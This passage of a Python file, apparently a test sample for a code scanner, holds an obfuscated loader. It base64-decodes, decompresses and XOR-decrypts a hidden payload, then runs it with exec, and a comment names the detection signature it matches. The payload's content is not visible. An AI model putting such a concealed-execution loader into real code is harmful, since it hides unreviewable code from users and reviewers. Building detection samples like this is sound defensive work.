l5uDRDqQnvP6n37LsAaunobaOMWVEnSRe86vwJ1g/Jr7GGQRG3EIfv6zOHQuKtLjuL82/rikz70GrP/89Du7uDv0D89RUrk="
_K = bytes.fromhex("aef65b2ea1a8f5c19203126d")

def _xor(buf, k):
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(buf))

def _decode():
    inner = zlib.decompress(base64.b64decode(_OUTER))
    return _xor(base64.b64decode(inner), _K).decode("utf-8")

if __name__ == "__main__":
    # SC3 signature: base64.b64decode(...) -> exec / compile near by
    exec(compile(_decode(), "<runtime>", "exec"), {})
